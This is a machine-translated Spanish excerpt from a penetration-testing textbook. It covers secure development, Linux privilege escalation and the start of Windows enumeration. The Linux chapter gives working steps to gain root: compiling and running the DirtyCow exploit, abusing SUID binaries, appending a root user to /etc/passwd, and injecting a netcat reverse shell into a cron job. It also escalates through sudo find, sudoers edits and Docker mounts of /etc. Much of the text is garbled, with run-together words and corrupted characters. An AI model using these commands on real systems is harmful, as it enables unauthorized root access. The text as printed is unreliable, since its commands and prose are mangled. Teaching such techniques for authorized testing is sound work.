identificar todos los componentes de los activos, incluidos los elementos de terceros, debe revisar la autenticación/autorización de cada uno de ellos. Diagrama de flujo de datos El diagrama de red mostrará, visualmente, todo lo que ha recopilado hasta ahora. Por ejemplo (consulte el diagrama de red en la Figura 9.23), nuestra empresa tiene un sitio web y una aplicación móvil. Puede simplificar el diagrama de red anterior utilizando un diagrama de flujo de datos (DFD) para visualizar todos los componentes juntos (consulte la Figura 9.24). Fase de desarrollo En esta etapa, el proyecto ya está aprobado (por el consejo de arquitectura) y pasa a la fase de desarrollo. Aquí es donde se desarrollan las características del sitio web o la aplicación móvil utilizando lenguajes de programación como C#.NET, Java, Angular, Swift, etc. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.23 Diagrama de red Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 9.24 Diagrama de flujo de datos Duringthedevelopmentphase, theteamwilluseabuildserver, likeJenkinsor TeamFoundationServer (nowadaysTFSiscalledAzureDevOps) .Thisbuild serverwillorchestratetheprojectsourcecode; por lo tanto, la integración wehavecontinuous (CI) andcontinuousdeployment (CD) .Inthedevelopmentphase, youmustensurethefollowing:. Pruebas Thesourcecodeisscannedregularlyusingastaticapplicationsecurity (SAST) automatedtool (. Por ejemplo, Veracode, Checkmarx, etc) submittedtothebuildserver de la SASTscannerwillspotsecurityflawsinsidethesourcecodeonceit ( Jenkins, TFS, etc.). Debe imponer este buen hábito a los proyectos para que puedan detectar problemas al principio durante el Canal de Telegram : @IRFaraExam Machine Translated by Google desarrollo del producto (en lugar de hacer esto escanear en el último minuto antes de la implementación en el servidor de producción). La revisión manual del código es esencial porque una herramienta automatizada no es suficiente para cubrir el 100 por ciento del código fuente. Después de terminar una nueva función (por parte del desarrollador), debe realizar este paso. La mayoría de las veces, el código fuente usa bibliotecas de terceros de código abierto (el objetivo es agregar más funcionalidades a la aplicación). En este caso, es su deber verificar estos tres elementos: ¿La biblioteca contiene alguna vulnerabilidad? ¿Está actualizado? ¿Es legal usarlo para uso comercial? Para hacer el trabajo, hay escáneres automáticos (por ejemplo, Sonatype Lifecycle) que pueden verificar estos tres elementos. Fase de prueba Después de terminar algunas funciones del producto, el proyecto está listo para implementarse en el servidor de prueba (QA). El objetivo de la implementación es tener un servidor de prueba separado donde los probadores puedan ir y probar la aplicación web/móvil. En esta etapa, usted, como profesional de seguridad, debe verificar los siguientes elementos: Es su oportunidad de ir y aprender las nuevas funcionalidades de la interfaz de usuario. Use la edición Burp Professional para probar manualmente las vulnerabilidades (pruebas de penetración web) de las nuevas funciones. Utilice una herramienta de prueba de seguridad de aplicaciones dinámicas (DAST) (p. ej., BurpSuite Enterprise Edition, Acunetix, etc.) para automatizar las pruebas de penetración web. Esta tarea se implementa en la fase de prueba porque necesita un sitio web en ejecución (por lo que debe implementarse en un entorno astable, antes de ejecutar la herramienta). Entorno de producción (implementación final) Una vez que el código se implemente en el entorno de producción, el sitio web o la aplicación móvil quedarán bajo la responsabilidad del equipo de seguridad operativa (OpSec). OpSec se encargará de supervisar y realizar pruebas de penetración periódicas (por lo general, una vez al año) en la infraestructura y las pruebas de penetración web también en la aplicación Canal de Telegram : @IRFaraExam Machine Translated by Google Últimamente, se implementaron programas de recompensas por errores y las empresas comenzaron a contratar cazadores de recompensas por errores externos para buscar cualquier defecto que faltara y que no se detectara durante todas las fases anteriores. Resumen Es probable que más del 80 por ciento del tiempo de un consultor de seguridad cibernética se dedique a las pruebas de penetración de aplicaciones web. Le recomendamos encarecidamente que domine este tema antes de continuar con este libro. La fórmula simple para dominar cualquier habilidad se basa en dos factores: conocimiento y práctica (la habilidad heredada también es un factor menor). ¿Qué sigue? En el próximo capítulo, profundizaremos en el concepto de escalada de privilegios de Linux. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 10 Escalada de privilegios de Linux En esta etapa, ya tiene un caparazón limitado, y le gustaría ir más allá y obtener un caparazón raíz en su lugar . Este capítulo se enfoca principalmente en la escalada de privilegios del sistema operativo Linux, y el capítulo siguiente tratará el sistema operativo Windows. Aunque el sistema operativo Windows es popular entre los hosts de los clientes, la mayoría de la infraestructura de red y los servidores utilizan el sistema operativo Linux. El objetivo de este capítulo (y de este libro en general) es enseñarle la metodología y no depender de herramientas para hacer el trabajo. carrera profesional. Este capítulo cubrirá los siguientes temas: LinuxKernelexploits Explotación de SUID de Linux Manipulación de archivos de configuración de Linux Exploitingrunningservices sudoers explotación Scripts automatizados para la escalada de privilegios de Linux Introducción a las vulnerabilidades del kernel y faltantes Configuraciones La escalada de privilegios en un sistema operativo Linux se puede lograr de dos maneras: explotandoelkernel Explotación de una configuración débil del sistema (principalmente implementada por el usuario raíz) Canal de Telegram : @IRFaraExam Machine Translated by Google En el resto de este capítulo, profundizaremos en cada categoría para lograr el objetivo (obtener un shell raíz). Empecemos. Exploits del núcleo El kernel es el corazón del sistema operativo Linux y se ejecuta con privilegios de root. Una falla que pueda interactuar con el kernel permitirá que su usuario se ejecute en modo root. Tenemos algunos desafíos cuando queremos ejecutar una explotación en el host de destino. Aquí están los pasos para hacerlo: 1.Identifiquelaversióndelkernel. 2. Busque un exploit que coincida con la versión del kernel (encontrado en el paso 1). 3. Transferir el exploit al host vulnerable (profundizaremos en esto) tema más adelante en este capítulo). 4. Encuentre la manera de engañar al host vulnerable para que ejecute nuestra carga útil, como compilar el código C en el host remoto. Explotación del kernel:DirtyCow La vaca sucia representa la función de copia sobre escritura (COW) de la memoria privada de solo lectura. ¿Cómo funciona esta explotación? En una situación normal, un mecanismo COW leerá un archivo en la memoria y, por lo tanto, creará una copia en la memoria de ese archivo. Los creadores de este exploit intentaron crear miles de iteraciones en las que, en un momento determinado, el kernel sobrescribirá el archivo original. Este comportamiento dará a los atacantes una opción para sobrescribir el archivo que deseen. Debido a la naturaleza de este exploit (ejecutar miles de iteraciones), el sistema de destino podría fallar, así que tenga cuidado cuando lo use. Dicho esto, intentemos explotar esta vulnerabilidad. Primero, veamos los permisos de usuario actuales usando el comando id : elliot@ubuntu14Server:~$ id uid=1001(elliot)gid=1001(elliot)grupos=1001(elliot) Canal de Telegram : @IRFaraExam Machine Translated by Google En esta etapa, el usuario elliot tiene permisos limitados. Probemos esto intentando acceder al archivo /etc/shadow : elliot@ubuntu14Server:~$ cat/etc/shadow cat:/etc/ shadow:Permiso denegado A continuación, verifiquemos la versión del kernel en este servidor de usuario de Ubuntu: elliot@ubuntu14Server:~$ uname ÿa Linuxubuntu14Server3.13.0ÿ32-generic#57-UbuntuSMPTueJul1503:51:08UTC2014x86_64x86_64x86_64GNU/ Linux Dado que la versión es 3.13 (que es menor que la versión 3.9), podemos suponer que es vulnerable a la explotación de la vaca sucia. Si realiza una búsqueda en línea de la explotación de la vaca sucia, verá la pantalla en la Figura 10.1. Este exploit de Dirtycow admite versiones de Linux entre 2.6.22 y 3.9. Figura 10.1 GoogleSearch – DirtyCOWExploit exploit-db es mi opción cuando se trata de referencias de exploits, que es el primer elemento en los resultados de la búsqueda. El enlace lo llevará al sitio web de exploit-db en www.exploit-db.com/exploits/40839 . A continuación, descargue el código C de exploitÿdb a su Kalibox. Tenga en cuenta que estoy conectado con un shell limitado al host remoto usando Kali. El mayor desafío en este momento es transferir la explotación del archivo C al Canal de Telegram : @IRFaraExam Machine Translated by Google host vulnerable. Para hacer el trabajo, podemos usar el servidor web de Python para alojarlo: root@kali:~/Descargas#python-mSimpleHTTPServer8000 SirviendoHTTPon0.0.0.0port8000… A continuación, vuelva al shell limitado de SSH y ejecute las siguientes cinco acciones: Cambie el directorio de trabajo a /tmp porque tenemos más flexibilidad en esta carpeta (tenemos permisos de escritura). Utilice el comando wget para descargar el exploit. Compile el código C de acuerdo con la documentación de explotación (se encuentra en la parte superior de la sección de comentarios del código C). Ejecute el exploit de acuerdo con la documentación de exploitÿdb . Cambie al usuario recién creado llamado firefart . elliot@ubuntu14Server:/tmp$ wgethttp://172.16.0.102:8000/40839.c --2020-08-1711:43:50-http://172.16.0.102:8000/40839.c Conectando a 172.16.0. 102:8000... conectado. Solicitud HTTP enviada, esperando respuesta… 200 OK Longitud: 5006 (4,9 K) [texto/sin formato] Guardando en: '40839.c' 100% [=============================================== ============================== 5,006--. K/sin0s2020-08-1711:43:50(657MB/s )-'40839.c'saved[5006/5006] elliot@ubuntu14Server:/tmp$ gccÿ pthread40839.cÿodirtyÿlcrypt elliot@ubuntu14Server:/tmp$ chmod+xdirty elliot@ubuntu14Server:/tmp$ ./ dirty / etc/contraseña respaldada con éxito en/tmp/contraseña.bak Ingrese la nueva contraseña: Línea completa: firefart: fi6bS9A.C7BDQ: 0: 0: pwned: / root: / bin / bash mmap:7f297c216000 ptrace0 ¡Listo! Compruebe/ etc/passwd para ver si se creó el nuevo usuario. Puede iniciar sesión con el nombre de usuario 'firefart' y la contraseña 'test'. ¡NO OLVIDES RESTAURAR!$mv/tmp/passwd.bak/etc/passwd elliot@ubuntu14Server:/tmp$ sufirefart Contraseña: Canal de Telegram : @IRFaraExam Machine Translated by Google firefart@ubuntu14Server:/tmp# id uid=0(firefart)gid=0(raíz)grupos=0(raíz) ¡Usamos raíz! Dirtycowis es solo un exploit famoso; este ejercicio fue solo para mostrarle cómo hacer el trabajo cuando tiene un núcleo heredado. SUIDEexplotación Este exploit de ID de usuario (SUID) (personalmente lo llamo ID de superusuario de exploit) es una debilidad que permite a los usuarios ejecutar el permiso de un usuario específico (por ejemplo, raíz). Para buscar estos tipos de archivos, usaremos el comando de búsqueda para hacer el trabajo: elliot@ubuntu14Server:~$ find/ÿpermÿu=sÿtypef2>/dev/null /bin/umount /bin/mount / bin/ping6 /bin/su /bin/ping /bin/fusermount /usr/bin/ traceroute6.iputils /usr/bin/chsh / usr/bin/pkexec /usr/bin/at /usr/bin/chfn /usr/bin/mtr /usr/bin/sudo /usr/bin/passwd /usr/ bin/ gpasswd /usr/bin/newgrp /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/ openssh/ssh-keysign /usr/lib/pt_chown /usr/lib/eject/dmcrypt-get- dispositivo /usr/lib/ policykit-1/polkit-agent-helper-1 /usr/sbin/pppd /usr/sbin/uuidd /opt/bashme El archivo bashme es un buen candidato. De hecho, creé este archivo para este ejercicio en Canal de Telegram : @IRFaraExam Machine Translated by Google El propósito es mostrarle cómo funciona. Probablemente se esté preguntando cómo supe que no había candidatos. La respuesta es simple : todos son archivos del sistema para Linux . elliot@ubuntu14Server:~$ cd/opt elliot@ubuntu14Server:/opt$ lsÿla total20 drwxrxr-x2rootroot4096Aug1716:50. drwxr-xrx22rootroot4096Aug1710:25..ÿrwsrÿxrÿ x1rootroot8577Aug1716:50bashme Tome nota de la s (se llama bit fijo) al comienzo del valor de los permisos. De hecho, esto sucedió porque el usuario raíz ya ejecutó uno de los siguientes comandos para este archivo. $chmodu+s/opt/bashme $chmod4755/opt/bashme En esta etapa, todo lo que necesitamos para ejecutarlo usando nuestro shell de usuario limitado: elliot@ubuntu14Server:/opt$ ./bashme root@ubuntu14Server:/opt#id uid=0(root)gid=1001(elliot)groups=0(root),1001(elliot) Entonces, ¿qué hay dentro de este archivo bashme ? Es un ejecutable compilado de código C creado por el usuario raíz. En algunos otros casos (CTF, etc.), este es un archivo Bash ( .sh ) donde puede escribir su propio script: #include<stdio.h> #include<unistd.h> #include<sys/types.h> intmain(void) { setresuido (0,0,0); sistema ("/ bin / bash"); retorno0; } La raíz ha creado este archivo en el host vulnerable. Además, cuando lo ejecutamos usando una cuenta con privilegios bajos, el código compilado llamará a la función del sistema y cargará la ventana Bash usando privilegios de raíz. Recuerde que para compilar el código C (en general) necesitará ejecutar el siguiente comando: Canal de Telegram : @IRFaraExam Machine Translated by Google $gcc[archivo fuente].co[nombrearchivosalida] Para un ejecutable compilado de 32 bits, debe ejecutar el siguiente comando. Esto depende de si el sistema Linux de destino es una versión de 32 o 64 bits. Tenga en cuenta que no puede ejecutar una aplicación de 64 bits en un sistema de 32 bits: $gcc-m32[archivo de origen].co[nombre de archivo de salida] Anulación del archivo de usuarios de contraseñas Hay múltiples enfoques para encontrar la manera de escribir en el archivo /etc/passwd . En resumen, si tiene permisos de escritura en este archivo, puede generar una cuenta de usuario raíz que puede utilizar para iniciar sesión. Compruebe si el usuario actual (usuario de shell limitado) tiene permisos de escritura para este archivo. Compruebe si la SUI está configurada para el comando cp (copiar). Compruebe si el SUI está configurado para los editores de texto Viman y Nano (o cualquier otro tipo de editores de texto). El primer punto es fácil de implementar, solo necesitamos generar el usuario root y agregarlo al archivo (recuerde que ya tenemos un permiso de escritura en el archivo). elliot@ubuntu14Server:~$lsÿla/etc/passwd ÿrwxrÿ xrwx1rootroot1293Aug1716:45/etc/passwd Parece que tenemos permisos de escritura en este archivo. Para probar este comportamiento, agregue el número 1 al archivo para ver si funciona: elliot@ubuntu14Server:~$ echo1>>/etc/passwd elliot@ubuntu14Server:~$ cat/etc/passwd root:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash /sbin:/usr/sbin / nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/ sbin/nologin sync:x:4:65534:sync: /bin:/bin/sync […] messagebus:x:102:106::/var/run/dbus:/bin/false paisaje:x:103:109::/ var/lib/paisaje:/bin/false sshd:x:104:65534::/var/ejecutar/sshd:/ usr/sbin/nologin Canal de Telegram : @IRFaraExam Machine Translated by Google postgres:x:105:111:Administrador de PostgreSQL,,,:/var/lib/postgresql:/bin/bash gus:x:1000:1000:guskhawaja,,,:/home/gus:/bin/bash elliot:x: 1001:1001:elliot,11,0,0,Fsociety:/home/elliot:/bin/bash 1 ¡Impresionante, funciona! A continuación, genere un usuario raíz real . Para hacer el trabajo , utilice el comando OpenSSL para generar una contraseña de fsociety ; el nombre de usuario será mrrobot: elliot@ubuntu14Servidor:~$ opensslpasswdÿ1ÿsaltmrobotfsociety $1$mrrobot$uBJaW/ VOizY1OYia6mMLc1 Ahora, agregue el nuevo usuario al archivo de contraseñas (usaremos el editor de texto Nano para hacer el trabajo). Revisemos el contenido de este archivo, que se muestra aquí: elliot@ubuntu14Server:~$ cat/etc/passwd […] mrrobot: $1$mrrobot$uBJaW/VOizY1OYia6mMLc1:0:0:raíz:/raíz:/ bin/bash ¿Qué cree que sucederá cuando cambie al nuevo usuario de mrobot ? ¿Es usuario root? elliot@ubuntu14Servidor:~$ sumrrobot Contraseña:root@ubuntu14Server:/home/elliot# id uid=0(root)gid=0(root)groups=0(root) En este escenario, pudimos agregar el nuevo usuario porque teníamos permisos de escritura. El segundo escenario es si el comando cp tenía el bit SUID activado. Si ese es el caso, entonces debe crear un nuevo archivo de contraseña y luego usar el comando cp para hacer el trabajo: $cp[suarchivocontraseñageneradopersonalizado]/etc/contraseña No olvide copiar primero los usuarios existentes del archivo original, antes de agregar el nuevo usuario raíz. El escenario final se puede explotar cuando el SUI Disset para el editor de texto Nano o Vim, por ejemplo. Luego, esta marca le permitirá usar uno de estos editores de texto para cambiar el contenido del archivo de contraseña wd y agregar un nuevo usuario raíz. CRONJobsPrivilegeEscalation Canal de Telegram : @IRFaraExam Machine Translated by Google El cronograma dentro del sistema Linux, que permite a los usuarios crear tareas programadas. Por tareas, queremos decir comandos; para los hackers, esto es una puerta para la explotación. ¿Qué pasa si podemos verificar qué está tratando de programar el usuario raíz? CRONConceptos básicos Un usuario raíz puede programar una tarea para ejecutar un sistema Linux de diferentes maneras. El primer método es usar los directorios cron : /etc/cron.daily/ /etc/cron.horaria/ /etc/cron.monthly/ /etc/cron.weekly/ Cualquier archivo de secuencia de comandos guardado en cada carpeta se ejecutará de acuerdo con su período de tiempo. Por ejemplo, un archivo script ubicado en la carpeta /etc/cron.daily/ se ejecutará diariamente. Crontab El segundo método es el uso de crontab. Un usuario raíz puede programar una tarea programada en todo el sistema mediante el archivo /etc/crontab . Este es el escenario más común que puede encontrar cuando un usuario raíz desea programar una tarea. Minuto (0-59) Hora (0-24) Día (1-31) Mes (1-12) Día de la semana (0-6,0 es Domingoy6esSábado)[Comandoparaejecutar] Por ejemplo, para ejecutar el script sys.sh cada hora al minuto 0 (por ejemplo, 6 a. m., 7 a. m., etc.), use esto: 0 ****/raíz/sys.sh El asterisco significa cualquier valor posible para un minuto, mes, etc. También puede utilizar los siguientes operadores: Coma (,): Esto especifica números enteros consecutivos como 1,2,3,4,5 . Guión (ÿ): este carácter le permitirá especificar rangos . Por ejemplo, 1ÿ5 es lo mismo que 1,2,3,4,5 . Canal de Telegram : @IRFaraExam Machine Translated by Google Barra diagonal (/): Esto especifica un valor de paso. Por ejemplo, cada 4 horas . es un archivo de configuración de todo el sistema. Pero equivale a */4/etc/crontab cada usuario puede configurar sus propias tareas de crontab ejecutando el siguiente comando: $crontab-e El comando anterior abrirá el archivo crontabuser y permitirá que el usuario agregue tareas. Anacrontab Otra forma final de agregar trabajos cron es usar una tabuladora. El archivo de configuración de todo el sistema para esta se encuentra en /etc/anacrontab . ¿Por qué usar este método? De hecho, anacron no espera que su host esté siempre ejecutándose; verificará todos los scripts programados después de que reinicie su host. Esto es práctico para hosts normales donde espera que estén apagados. Período 7 retrasar el comando identificador de trabajo 10backup.dailycp/etc/passwd/root/ El primer campo es el período, un valor numérico que representa el número de días de la tarea: 1: Mediodiario 7: Media semanal 30: Medias mensuales O puede usar este formato: @diario/@semanal/@mensual . Puede usar un número personalizado para especificar cualquier número para los días. El segundo campo es la demora de minutos que la máquina debe esperar después de un reinicio (antes de ejecutar las tareas programadas). El tercer campo es el identificador del nombre del trabajo. Cada tarea debe tener un nombre único y se guardará un archivo con el mismo nombre en el directorio /var/spool/anacron/ . Este archivo contendrá una marca de tiempo de la última vez que se ejecutó el trabajo . Finalmente, el último campo identificará el comando que queremos ejecutar. Enumeración y explotación de CRON Canal de Telegram : @IRFaraExam Machine Translated by Google Para obtener una lista de todos los contenidos del directorio cron, use: $ls-la/etc/cron*2>/dev/null Parabuscarmundo: trabajos cron grabables, establezca: $find/etc/cron*-perm-0002-typef-execls-la{}\;-execcat{}2>/dev/null\; Para inspeccionar el contenido de la tabulación temporal, configure: $cat/etc/crontab2>/dev/null Para comprobar las entradas del cronta del usuario raíz, utilice: $crontab-l-uroot Tolistanacronjobs, utiliza: $ls-la/var/spool/anacron2>/dev/null Comencemos con un ejemplo de cómo explotar cron en un host Linux. tenga un usuario de shell limitado (elliot) conectado a un servidor de usuario de Ubunt . crontabentriesrevelaunatareaprogramadaqueseejecutacadaminutoyejecutauna script guardado en el directorio /root/schedule/ : elliot@ubuntu14Servidor:~$ cat/etc/crontab2>/dev/null [..] **** rootcd/&&run-parts--report/etc/cron.hourly *** 17roottest-x/usr/sbin/anacron||(cd/&&run-parts-256report/etc/cron.daily) ** 7roottest-x/usr/sbin/anacron||(cd/&&run-parts-476report/etc/cron.weekly) ** 5261roottest-x/usr/sbin/anacron||(cd/&&run-parts-informe/etc/cron.monthly) ***** root/opt/copia de seguridad.sh # elliot@ubuntu14Servidor:~$ A continuación, inspeccionemos el archivo para ver si podemos escribir en él usando el ls mando: elliot@ubuntu14Server:~$lsÿla/opt/backup.shÿ rwxrwxrwx1rootroot42Aug1915:20/opt/backup.sh En esta etapa, comenzaremos a escuchar en el puerto 1111 en un Kalibox para escuchar un Canal de Telegram : @IRFaraExam Machine Translated by Google shell entrante: root@kali:~#ncÿnlvp1111 escuchando[cualquiera]1111… A continuación, abra el script de tareas ( backup.sh ) con el editor de texto Nano e inserte su script de shell inverso. Elimine todo el contenido que contiene y reemplácelo con lo siguiente: rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc172.16.0.1021111>/tmp/f Guarde el texto (Ctrl+O) y cierre Nano (Ctrl+X). Espere un minuto a que se ejecute el trabajo y obtendrá un shell raíz: root@kali:~#nc-nlvp1111 escuchando en[cualquier]1111… conectarse a[172.16.0.102]desde(DESCONOCIDO)[172.16.0.101]50971 /bin/sh:0:no se puede acceder a tty;jobcontrolturnedoff #id uid=0(root )gid=0(raíz)grupos=0(raíz) # sudoers El comando sudo se introdujo en el sistema Unix/Linux para la separación de privilegios. Un usuario puede usar el comando sudo para ejecutar comandos con privilegios altos al proporcionar una contraseña. $sudousermod-aGsudo[nombre de usuario] Además, un administrador del sistema puede modificar el archivo de configuración de sudoers así como /etc/sudoers para obtener permisos más granulares. ¡Veamos cómo aprovecharlo! sudoPrivilegeEscalation Haydiferentesmanerasdeescalarnuestrospermisosparaobteneryejecutaruncomandodeprivilegioalto.Ashackers,n Busque el SUID en un editor de texto como Vim/Nano para editar el archivo sudoers . Canal de Telegram : @IRFaraExam Machine Translated by Google Enumere los permisos de sudo y busque cualquier programa que pueda omitir . Intenta ejecutar sudo sin contraseña. ExplotacióndelcomandoBuscar La sección anterior enumera las formas en que puede aprovechar las debilidades en los permisos de sudo . El segundo punto menciona que podemos enumerar los permisos de sudo . Para hacer el trabajo, usemos el comando apropiado como sigue: elliot@ubuntu14Server:~$sudoÿl [sudo]contraseñaforelliot: Coincidencia de entradas predeterminadas para el servidor ubuntu14: env_reset, mail_badpass, ruta_segura=/usr/local/sbin\:/usr/local/bin\:/usr/ sbin\:/usr/bin\:/sbin\:/bin El usuarioelliotpuedeejecutarlossiguientescomandosenelservidorubuntu14: (raíz)/usr/ bin/find El usuario elliot tiene la opción de ejecutar el comando de búsqueda con permisos de raíz. Veamos cómo podemos aprovechar este comando para la escalada de privilegios. Use la opción exec en el comando de búsqueda para ejecutar un shell raíz: elliot@ubuntu14Server:~$ sudofind/ÿexecshÿi \; #id uid=0(raíz)gid=0(raíz)groups=0(raíz) # Esa es una forma de explotar usando el comando de búsqueda , pero puede aprovechar cualquier programa enumerado en los permisos de sudo . Edición del archivo sudoers Recuerde que cualquier editor de texto que tenga configurado el bit SUID nos permitirá editar archivos de configuración, incluido el archivo /etc/sudoers . Primero, enumere los archivos SUID en su shell limitado actual: elliot@ubuntu14Server:~$ find/ÿpermÿu=sÿtypef2>/dev/null /bin/umount /bin/mount / bin/ping6 /bin/su /bin/ping /bin/fusermount Canal de Telegram : @IRFaraExam Machine Translated by Google /bin/nano / usr/bin/traceroute6.iputils /usr/bin/chsh El programa Nano aparece en la lista de resultados, por lo que puedo usarlo para editar el archivo sudoers : $ nano /. etc permiso para elliot (lo insertaré agregaré al final delun Una/ sudoerssudo vez que se cargue el archivo de configuración, archivo): #Allowmembersofgroupsudotoejecutanycommand #%sudoALL=(ALL:ALL)ALL #Seesudoers(5)para obtener más información sobre las directivas "#include": #includedir/etc/sudoers.d elliotALL=(TODO)SINPASSWD:TODO Para asegurarse de que los cambios surtan efecto, salga de la sesión SSH de elliot y vuelva a iniciar sesión. Una vez que haya iniciado sesión, ejecute el shell SH con el comando sudo . Tenga en cuenta que la ventana del terminal no solicitó una contraseña y eso se debe a la configuración "NOPASSWD" que agregamos anteriormente: elliot@ubuntu14Server:~$sudoshÿi #id uid=0(raíz)gid=0(raíz)groups=0(raíz) # Explotación de los servicios de ejecución Algunos servicios instalados en un sistema Linux se ejecutarán en modo de acceso root. Esta falla nos permite aprovechar este comportamiento y obtener un shell raíz. elliot@ub01:/$ psÿaux|grepDocker elliot30460.00.017532724pts/0S+09:140:00grepÿÿcolor=autoDocker Ejecute el mismo ataque que hicimos anteriormente mediante la manipulación del archivo de configuración sudoers . A continuación, ejecute un nuevo contenedor basado en la imagen de Alpine: elliot@ub01:~$ dockerrunÿitdÿv/etc/:/mnt/alpine 17d6da6fca8152fd8f2360abc5a4cad928c0d655e2c1fadac7df1de6c669dd23 elliot@ub01:~$ dockerps Canal de Telegram : @IRFaraExam Machine Translated by Google ID DE CONTENEDOR COMANDO DE IMAGEN CREADO ESTADO NOMBRES DE PUERTOS alpino"/bin/sh"10segundosagoUp9segundos 17d6da6fca81bold_aryabhata Tenga en cuenta que montamos /etc/ en el host de Ubuntu en /mnt/ en el contenedor Docker . Es hora de interactuar con el contenedor para editar el archivo sudoers : elliot@ub01:~$ dockerexecÿit17d6da6fca81/bin/sh /# cd/mnt/ /mnt# echo"elliotALL=(ALL)NOPASSWD:ALL">>sudoers /mnt# exit Veamos si podemos usar el comando sudo para obtener un shell raíz en el host de Ubuntu: elliot@ub01:~$ sudoshÿi #id uid=0(raíz)gid=0(raíz)groups=0(raíz) # Scripts automatizados En este punto, debe comprender cómo obtener acceso raíz con un shell limitado. Dicho esto, todos los comandos discutidos en este capítulo se pueden automatizar para comprobar si el sistema Linux de destino es vulnerable. A primera vista, la información es abrumadora, y un script automatizado nos hará la vida más fácil. Cuando desee utilizar un script, recuerde seguir estos pasos: 1. Inicie el servidor web para su Kalihost (para que pueda transferir el archivo de script). 2. Desde el shell limitado en el host Linux de destino, haga lo siguiente: a. Cambie su directorio actual a donde tenga permisos para escribir (por ejemplo, / tmp/ ). b.Descargueelarchivomediantewgetocurl . c.Cambieelpermisoenelarchivomedianteelcomandochmod + x . _ _ d. Ejecute el archivo de script (opcionalmente, guarde la salida en caso de que pierda su cascarón). Estos son los tres principales scripts automatizados que puede usar durante sus pruebas de penetración (puede guardarlos para usarlos siempre que llegue el momento de la escalada de privilegios): Canal de Telegram : @IRFaraExam Machine Translated by Google LinEnum: github.com/rebootuser/LinEnum LinuxPrivChecker: github.com/sleventyeleven/linuxprivchecker LinuxExploitSuggester: github.com/mzet-/linux-exploit-suggester UngrantoneesLinEnum. Estos son los pasos para implementar cuando desee utilizar esta herramienta en un host Linux de destino: 1. Inicie el servidor web en mi host Kali (la máquina atacante). 2. En el shell limitado, cambie su directorio actual a /tmp (porque esto carpeta generalmente permite que todos escriban y ejecuten). 3. Descargue el script Lin Enum en el host de destino (víctima) mediante el wget mando. $wgethttp://[KaliIP]/LinEnum.sh 4. Otorgue al archivo los permisos de ejecución. $chmod+xLinEnum.sh 5. Ejecutarlo. $./LinEnum.sh Resumen El sistema operativo Linux es vulnerable a la escalada de privilegios si su usuario root no lo configuró correctamente (o si el kernel no se actualizó adecuadamente). Si ese es el caso, tiene suficiente espacio para obtener un shell raíz. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 11 Escalada de privilegios de Windows Como sabe, el sistema operativo Microsoft Windows es popular entre los usuarios individuales y las empresas para sus empleados. Hay mucha información sobre la escalada de privilegios en el sistema operativo Windows y, como es habitual, todos los conceptos se explican a través de ejemplos. Al final de este capítulo, debería poder empezar a escalar sus privilegios con facilidad. Estecapítulocubrelossiguientestemas: CómoenumerarelsistemaoperativoWindows Cómo transferir archivos a Windows mientras está en un shell limitado Windowskernelexploits Explotación de los servicios de Windows Explotación de la GUI de Windows Herramientas de automatización de escalada de privilegios WindowsSystemEnumerationWindowsSystemEnumeration Antes de comenzar a explotar el sistema operativo Windows, necesitaremos enumerar el host. En esta sección, verá todos los comandos básicos de numeración para realizar el trabajo. Información del sistema Para explotar el sistema para la escalada de privilegios, deberá comprender los detalles del sistema operativo. El comando systeminfo le brindará mucha información sobre el sistema operativo Windows de destino : C:\Usuarios\Gus>info del sistema Nombre de host: WINDOWS10LAB Nombre del sistema operativo: MicrosoftWindows10Enterprise LTSC Versión del sistema operativo: 10.0.17763N/ABuild17763 Microsoft OSFabricante: Corporation Canal de Telegram : @IRFaraExam Machine Translated by Google Configuración del sistema operativo: OSBuildType: Dueño registrado: Organización Registrada: ID del Producto: Fecha de instalación original: Tiempo de arranque del sistema: Fabricante del sistema: Modelo de sistema: MiembroEstación de trabajo MultiprocesadorGratis Usuario de Windows 00424-90483-55456-AA805 6/1/2020,9:40:20AM 9/8/2020,5:30:37 p. m. VMware, Inc. VMware7,1 PC basado en x64 Tipo de sistema: Procesador(es): 1Procesador(es) instalado(s). [01]:Intel64Family6Model158Stepping10GenuineIntel~3192Mhz VMware, Inc. BIOSVersión:VMW71.00V.16221537.B64.2005150253,5/15/2020 WindowsDirectorio:C:\Windows Directorio del sistema: C:\Windows\system32 BootDevice:\Dispositivo\HarddiskVolume1 SystemLocale:en-us;Inglés (Estados Unidos) InputLocale:en-us;Inglés (Estados Unidos) Zona horaria: (UTC-05:00) hora del este (EE. UU. y Canadá) 4.095 MB 2553 MB 4,799 MB 3,434MB 1,365 MB C:\pagefile.sys KCorp.local \\WINDOWS10LAB TotalPhysicalMemory:AvailablePhysicalMemory:VirtualMemory:MaxSize:VirtualMemory:Available:VirtualMemory:I 10Revisión(es) instalada(s). [01]:KB4570720 [02]:KB4465065 [03]: KB4470788 [04]:KB4487038 [05]:KB4549947 [06]:KB4561600 [07]:KB4562562 [08]:KB4566424 [09]: KB4570332 [10]:KB4570333 Tarjeta(s) de red: 2NIC(s) instalado(s). [01]:DispositivoBluetooth(Personal red de área) Nombre de la conexión: BluetoothRedConexión Estado: Mediadisconnected [02]:Intel(R)82574LGigabit Canal de Telegram : @IRFaraExam Machine Translated by Google Conexión de red Nombre de la conexión: Ethernet0 DHCP habilitado: sí Servidor DHCP: 172.16.0.2 Dirección(es) IP [01]:172.16.0.104 [02]:fe80::8920:1b10:a0d5:635b Se ha detectado un Requisitos de Hyper-VR: no se hipervisor. mostrarán las características requeridas para Hyper-V. Como puede ver en los resultados anteriores, hay mucha información. Para hacerlo más simple, podemos filtrar el resultado usando el comando findstr , como se muestra aquí: C:\Usuarios\Gus>info del sistema|findstr/B/C:"Nombre del SO"/C:"Versión del SO" Nombre del sistema operativo: MicrosoftWindows10EnterpriseLTSC Versión del sistema operativo: 10.0.17763N/ABuild17763 WindowsArquitectura Para obtener la arquitectura, utilizaremos la utilidad WMIC. Encontrará la herramienta WMIC en diferentes escenarios si va a utilizar la línea de comandos de Windows. De hecho, esta utilidad proporciona una interfaz de línea de comandos para la instrumentación de administración de Windows: C:\Usuarios\Gus>wmicosgetosarchitecture||echo %PROCESADOR_ARQUITECTURA% Arquitectura OS de 64 bits Listado de unidades de disco Para 